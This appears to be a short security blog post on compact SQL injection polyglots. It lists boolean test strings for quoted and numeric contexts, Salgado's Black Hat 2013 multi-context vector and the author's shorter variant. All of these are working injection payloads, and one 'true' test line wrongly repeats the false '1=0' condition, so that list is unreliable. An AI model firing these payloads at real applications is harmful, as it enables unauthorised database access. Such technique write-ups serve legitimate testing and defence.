For Black Hat 2013, Roberto Salgado (@LightOS) came up with the idea of optimizing the detection phase of SQL injection vulnerabilities.
Usually, to test if a parameter is vulnerable to SQL injection, the following requests must be performed to find out the context of the injection. It might be between single quotes ('), double quotes (") or with no delimiters at all:
TRUE RESPONSES
-1' or '1'='1
-1" or "1"="1
-1 or 1=0
FALSE RESPONSES
-1' or '1'='0
-1" or "1"="0
-1 or 1=0
LightOS came up with the idea of fusing the three testing vectors. This is the multi-context functional polyglot that works in any of the already three mentioned contexts:
-1 OR 1#"or"'OR''='"="'OR''='
Numeric context:
-1 OR 1#"or"'OR''='"="'OR''='
Double quotation:
-1 OR 1#"or"'OR''='"="'OR''='
Single quotation:
-1 OR 1#"or"'OR''='"="'OR''='
You can find his slides in the following link: https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-Slides.pdf
My version of the vector is 7 characters shorter:
-1 or 1#'or"or'"!='!="
Numeric context:
-1 or 1#'or"or'"!='!="
Single quotation:
-1 or 1#'or"or'"!='!="
Double quotation:
-1 or 1#'or"or'"!='!="
I find LightOS's solution to be much more elegant because he used an equality. See if you can make it even shorter.